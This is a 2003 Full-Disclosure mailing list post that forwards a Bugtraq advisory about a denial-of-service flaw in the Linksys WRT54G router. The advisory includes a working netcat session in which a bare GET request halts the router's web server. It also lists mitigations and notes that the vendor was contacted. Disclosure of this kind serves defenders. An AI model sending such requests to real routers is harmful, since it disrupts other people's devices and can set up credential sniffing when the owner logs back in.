[Full-Disclosure] [Fwd: Bugtraq: Linksys WRT54G Denial of Service Vulnerability]

Michael Renzmann security at dylanic.de
Thu Dec 4 04:42:40 GMT 2003


Can anyone confirm if technically identical devices such as the Buffalo 
WBR-G54 share this vulnerability?

-------- Original Message --------
Subject: Linksys WRT54G Denial of Service Vulnerability
Date: 3 Dec 2003 22:35:26 -0000
From: <test at techcentric.net>
To: bugtraq at securityfocus.com

Linksys WRT54G Denial of Service Vulnerability

System(s)
===========

Tested on Linksys WRT54G v1.0 (firmware v 1.42.3)

Detail(s)
===========

Sending a blank GET request to the router on port 80 (or 8080) halts the 
embedded webserver.  This may allow an attacker to force the owner to 
reboot the router, allowing them to gain sensitive information during 
router authentication.

Exploitation
============

user@test:~$ nc 10.0.0.1 80
GET
user@test:~$ nc 10.0.0.1 80
(UNKNOWN) [10.0.0.1] 80 (http) : Connection refused
user@test:~$

Solution(s)
============

- Https service should continue running for remote access.
- Scan for sniffers that might be on the network before rebooting and 
performing any authentication.
- Wait for a vendor patch :)

Status
============

Vendor contacted on 12/03/03.

!HAPPY HOLIDAYS!

carbon at techcentric.net - 12/02/03